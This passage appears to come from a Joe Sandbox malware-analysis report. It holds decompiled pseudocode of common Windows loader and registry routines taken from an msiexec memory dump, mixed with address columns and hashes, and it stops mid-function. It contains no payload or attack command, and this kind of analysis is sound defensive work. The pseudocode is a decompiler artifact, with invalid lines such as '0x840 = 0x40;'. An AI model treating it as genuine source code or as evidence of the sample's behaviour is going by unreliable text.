                              0x04d351c1
                              0x04d351c5
                              0x04d351c9
                              0x04d351cd
                              0x04d351cd
                              0x04d351d8
                              0x04d351dc
                              0x04d351e0
                              0x04d76dcc
                              0x04d76dd0
                              0x04d76dd5
                              0x04d76ddd
                              0x04d76de1
                              0x04d76de1
                              0x04d76de5
                              0x04d76deb
                              0x04d76df1
                              0x04d76df7
                              0x04d76dfd
                              0x04d76e01
                              0x04d76e05
                              0x04d76e09
                              0x04d76e0d
                              0x04d76e11
                              0x04d76e11
                              0x04d351eb
                              0x04d76e1a
                              0x04d76e1f
                              0x04d76e21
                              0x04d76e23
                              0x00000000
                              0x04d351f1
                              0x04d351f1
                              0x00000000
                              0x04d351f1

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 301fdb9d660b9ead7db57fcfb7d478b31ebbe16e9d700f2306d9530c32a531a2
                              • Instruction ID: 8c43f819c14e2c32725f05ff078d6f54c8c6b96ee940b5a8ca4a494203760ac5
                              • Opcode Fuzzy Hash: 301fdb9d660b9ead7db57fcfb7d478b31ebbe16e9d700f2306d9530c32a531a2
                              • Instruction Fuzzy Hash: 9CC121756087809FD354CF28C590A5AFBF1BF88318F148A6EF8998B352E771E845CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D303E2 Relevance: .3, Instructions: 254COMMON
                              Download Yara Rule
                              C-Code - Quality: 74%
                              			E04D303E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4dfd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04D30548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04D4B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04D1B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4df7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04D27D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04D27D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04D87016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04D49830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04D869A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4df7c04 != 0) {
						_t118 = _v12;
						_t120 = E04D8A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4df7bd8;
						if( *0x4df7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04D495D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04D499A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04D83540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04D0B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04D4AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4df8474 - 3;
										if( *0x4df8474 != 3) {
											 *0x4df79dc =  *0x4df79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04D27D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04D27D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04D87016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4df8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4df7b00; // 0x0
							asm("ror esi, cl");
							 *0x4dfb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04D495D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04D17F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                              0x04d303f1
                              0x04d303f7
                              0x04d303f9
                              0x04d303fb
                              0x04d303fd
                              0x04d30400
                              0x04d3040a
                              0x04d74c7a
                              0x04d30537
                              0x04d30547
                              0x04d30410
                              0x04d30410
                              0x04d30414
                              0x04d30417
                              0x04d3041a
                              0x04d30421
                              0x04d30424
                              0x04d3042b
                              0x04d3043b
                              0x04d3043e
                              0x04d3043f
                              0x04d3043f
                              0x04d30446
                              0x04d30449
                              0x04d3044c
                              0x04d3044f
                              0x04d30459
                              0x04d74c8d
                              0x04d3045f
                              0x04d3045f
                              0x04d3045f
                              0x04d30467
                              0x04d74c97
                              0x04d74c9d
                              0x04d74ca4
                              0x04d74caa
                              0x04d74caf
                              0x04d74cb1
                              0x04d74cc3
                              0x04d74cb3
                              0x04d74cbc
                              0x04d74cbc
                              0x04d74cc8
                              0x04d74ccb
                              0x04d74cd7
                              0x04d74cda
                              0x04d74cdf
                              0x04d74cdf
                              0x04d74ccb
                              0x04d74ca4
                              0x04d3046d
                              0x04d3046f
                              0x04d3046f
                              0x04d30471
                              0x04d30476
                              0x04d3047a
                              0x04d3047b
                              0x04d30483
                              0x04d30489
                              0x04d3048d
                              0x00000000
                              0x00000000
                              0x04d74ce9
                              0x04d74cef
                              0x04d74d22
                              0x04d74d22
                              0x00000000
                              0x04d74d22
                              0x04d74cf1
                              0x04d74cf7
                              0x00000000
                              0x00000000
                              0x04d74cf9
                              0x04d74cff
                              0x00000000
                              0x00000000
                              0x04d74d05
                              0x04d74d07
                              0x00000000
                              0x00000000
                              0x04d74d0d
                              0x04d74d0f
                              0x04d74d14
                              0x04d74d16
                              0x00000000
                              0x00000000
                              0x04d74d1c
                              0x04d74d1c
                              0x04d30499
                              0x04d30535
                              0x04d30535
                              0x00000000
                              0x04d30535
                              0x04d304a6
                              0x04d74d2c
                              0x04d74d37
                              0x04d74d39
                              0x04d74d3b
                              0x00000000
                              0x00000000
                              0x04d74d41
                              0x04d74d48
                              0x04d30527
                              0x04d3052b
                              0x04d3052d
                              0x04d30530
                              0x04d30530
                              0x00000000
                              0x04d3052b
                              0x04d74d4e
                              0x04d304ac
                              0x04d304ac
                              0x04d304af
                              0x04d304b2
                              0x04d304b7
                              0x04d304b9
                              0x04d304bb
                              0x04d304bd
                              0x04d304bf
                              0x04d304c5
                              0x04d304c9
                              0x04d74d53
                              0x04d74d59
                              0x04d74db9
                              0x04d74dba
                              0x04d74dbf
                              0x04d74dc2
                              0x04d74dc4
                              0x04d74dc7
                              0x04d74dce
                              0x00000000
                              0x04d74dce
                              0x04d74d5b
                              0x04d74d61
                              0x00000000
                              0x00000000
                              0x04d74d63
                              0x04d74d69
                              0x00000000
                              0x00000000
                              0x04d74d6b
                              0x04d74d6e
                              0x04d74d74
                              0x04d74d76
                              0x04d74d7c
                              0x04d74d7e
                              0x04d74d84
                              0x04d74d89
                              0x04d74d8c
                              0x04d74d8d
                              0x04d74d92
                              0x04d74d95
                              0x04d74d96
                              0x04d74d98
                              0x04d74d9a
                              0x04d74d9f
                              0x04d74da4
                              0x04d74da6
                              0x04d74da8
                              0x04d74daf
                              0x04d74db1
                              0x04d74db1
                              0x04d74daf
                              0x04d74da6
                              0x04d74d84
                              0x04d74d7c
                              0x00000000
                              0x04d74d74
                              0x04d304d6
                              0x04d74de1
                              0x04d304dc
                              0x04d304dc
                              0x04d304dc
                              0x04d304e4
                              0x04d74deb
                              0x04d74df1
                              0x04d74df8
                              0x04d74dfe
                              0x04d74e03
                              0x04d74e05
                              0x04d74e17
                              0x04d74e07
                              0x04d74e10
                              0x04d74e10
                              0x04d74e1c
                              0x04d74e1f
                              0x04d74e35
                              0x04d74e35
                              0x04d74e1f
                              0x04d74df8
                              0x04d304f1
                              0x04d304fa
                              0x04d74e3f
                              0x04d74e47
                              0x04d74e5b
                              0x04d74e61
                              0x04d74e67
                              0x04d74e69
                              0x04d74e71
                              0x04d74e73
                              0x04d30500
                              0x04d30500
                              0x04d30500
                              0x04d304fa
                              0x04d30508
                              0x04d3051d
                              0x04d3051d
                              0x04d3051f
                              0x04d30524
                              0x00000000
                              0x04d30524
                              0x04d30515
                              0x04d30517
                              0x04d74e7a
                              0x04d74e7c
                              0x00000000
                              0x00000000
                              0x04d74e85
                              0x00000000
                              0x04d74e85
                              0x00000000
                              0x04d30517

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be9508a60b006d02a195e27db39dd8a50d2fe9bfbaa745ec6ab6eaeb0345802e
                              • Instruction ID: 08095ed9203327abebeb0a519784db1ffc1920e01ba497a0a1d92548c333eadb
                              • Opcode Fuzzy Hash: be9508a60b006d02a195e27db39dd8a50d2fe9bfbaa745ec6ab6eaeb0345802e
                              • Instruction Fuzzy Hash: 33911631F00254AFEB339B68C848BAE7BA5FB01729F054266E950AB2D5F774BD40C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0C600 Relevance: .2, Instructions: 225COMMON
                              Download Yara Rule
                              C-Code - Quality: 67%
                              			E04D0C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4dfd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04D16D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04D4B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4df7b9c; // 0x0
					_t74 = L04D24620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04D49650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04D277F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04D4F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04D413C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04D277F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04D49650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                              0x04d0c608
                              0x04d0c615
                              0x04d0c625
                              0x04d0c62d
                              0x04d0c635
                              0x04d0c640
                              0x04d0c680
                              0x04d0c687
                              0x04d0c688
                              0x04d0c689
                              0x04d0c694
                              0x04d0c694
                              0x04d0c642
                              0x04d0c64a
                              0x04d0c697
                              0x04d77a25
                              0x04d77a2b
                              0x04d77a2e
                              0x04d77a30
                              0x04d77bea
                              0x04d77bea
                              0x00000000
                              0x04d77bea
                              0x04d77a36
                              0x04d77a43
                              0x04d77a48
                              0x04d77a4c
                              0x04d77a4e
                              0x00000000
                              0x00000000
                              0x04d77a58
                              0x04d77a5a
                              0x04d77a5b
                              0x04d77a5c
                              0x04d77a5d
                              0x04d77a63
                              0x04d77a64
                              0x04d77a6a
                              0x04d77a6c
                              0x04d77a6e
                              0x04d779cb
                              0x04d779cb
                              0x04d779ce
                              0x04d779d0
                              0x04d77a98
                              0x04d77a9b
                              0x04d77a9b
                              0x04d77a9e
                              0x04d77aa1
                              0x04d77bbe
                              0x04d77bbe
                              0x04d77bc0
                              0x04d77be0
                              0x04d77be0
                              0x04d77a01
                              0x04d77a01
                              0x04d77a05
                              0x04d77a07
                              0x04d77a15
                              0x04d77a15
                              0x04d77a1a
                              0x00000000
                              0x04d77a1a
                              0x04d77bc2
                              0x04d77bc6
                              0x04d77bc9
                              0x04d77bcd
                              0x04d77bcf
                              0x04d779e6
                              0x04d779e6
                              0x04d779eb
                              0x04d779eb
                              0x04d779ef
                              0x04d779f1
                              0x00000000
                              0x00000000
                              0x04d779f3
                              0x04d779f5
                              0x04d779ff
                              0x04d779ff
                              0x00000000
                              0x04d779ff
                              0x04d779f7
                              0x04d779fd
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d779fd
                              0x04d77bd5
                              0x04d77bd8
                              0x00000000
                              0x00000000
                              0x04d77ba9
                              0x04d77bac
                              0x04d77bb0
                              0x04d77bb1
                              0x04d77bb1
                              0x04d77bb6
                              0x00000000
                              0x04d77bb6
                              0x04d77aa7
                              0x04d77aaa
                              0x00000000
                              0x00000000
                              0x04d77ab2
                              0x04d77ab3
                              0x04d77ab5
                              0x04d77aec
                              0x04d77aef
                              0x04d77b25
                              0x04d77b28
                              0x04d77b62
                              0x04d77b64
                              0x04d77b8f
                              0x04d77b92
                              0x04d77b96
                              0x04d77b98
                              0x00000000
                              0x00000000
                              0x04d77b9e
                              0x04d77b9f
                              0x04d77ba3
                              0x00000000
                              0x04d77ba3
                              0x04d77b66
                              0x04d77b68
                              0x04d77ae2
                              0x04d77ae2
                              0x00000000
                              0x04d77ae2
                              0x04d77b6e
                              0x04d77b72
                              0x04d77b75
                              0x04d77b81
                              0x04d77b85
                              0x04d77b87
                              0x00000000
                              0x00000000
                              0x04d77b31
                              0x04d77b34
                              0x04d77b3c
                              0x04d77b45
                              0x04d77b46
                              0x04d77b4f
                              0x04d77b51
                              0x04d77b57
                              0x04d77b59
                              0x04d77b59
                              0x00000000
                              0x04d77b59
                              0x04d77b77
                              0x00000000
                              0x04d77b77
                              0x04d77b2a
                              0x00000000
                              0x04d77b2a
                              0x04d77af1
                              0x04d77af3
                              0x00000000
                              0x00000000
                              0x04d77afb
                              0x04d77afc
                              0x04d77afe
                              0x00000000
                              0x00000000
                              0x04d77b00
                              0x04d77b03
                              0x00000000
                              0x00000000
                              0x04d77b05
                              0x04d77b09
                              0x04d77b0d
                              0x04d77b0f
                              0x00000000
                              0x00000000
                              0x04d77b18
                              0x04d77b1d
                              0x00000000
                              0x04d77b1d
                              0x04d77ab7
                              0x04d77ab9
                              0x00000000
                              0x00000000
                              0x04d77abf
                              0x04d77ac1
                              0x00000000
                              0x00000000
                              0x04d77ac3
                              0x04d77ac6
                              0x00000000
                              0x00000000
                              0x04d77ac8
                              0x04d77acc
                              0x04d77ad0
                              0x04d77ad2
                              0x00000000
                              0x00000000
                              0x04d77adb
                              0x00000000
                              0x04d77adb
                              0x04d779d6
                              0x04d779d9
                              0x04d779dc
                              0x04d77a91
                              0x04d77a94
                              0x00000000
                              0x04d77a94
                              0x04d779e2
                              0x00000000
                              0x04d779e2
                              0x04d77a74
                              0x04d77a7a
                              0x00000000
                              0x00000000
                              0x04d77a8a
                              0x04d77a21
                              0x04d77a21
                              0x00000000
                              0x04d77a21
                              0x04d0c650
                              0x04d0c651
                              0x04d0c656
                              0x04d0c65c
                              0x04d0c65d
                              0x04d0c663
                              0x04d0c664
                              0x04d0c66a
                              0x04d0c66e
                              0x04d779c5
                              0x04d779c7
                              0x00000000
                              0x04d779c7
                              0x04d0c67a
                              0x00000000
                              0x00000000
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6a3b7b7f158d4340bae4412cd8c44a7c2179458a8c1cbe1bd396f6a52f246880
                              • Instruction ID: b524c176b8f5be01835d8224fbe020a4f4539a9e523c043034764700c70c9403
                              • Opcode Fuzzy Hash: 6a3b7b7f158d4340bae4412cd8c44a7c2179458a8c1cbe1bd396f6a52f246880
                              • Instruction Fuzzy Hash: F0818D767442019BEB25CF14C881A6BB3A5FB84354F144D6EED899B241F330FD44CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D86DC9 Relevance: .2, Instructions: 199COMMON
                              Download Yara Rule
                              C-Code - Quality: 79%
                              			E04D86DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04D86B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04D27D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04D49AE0();
					_t87 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04D8795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04D8795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04D8795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04D8795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04D24620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04D86B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04D86B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04D86B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04D86B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04D27D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
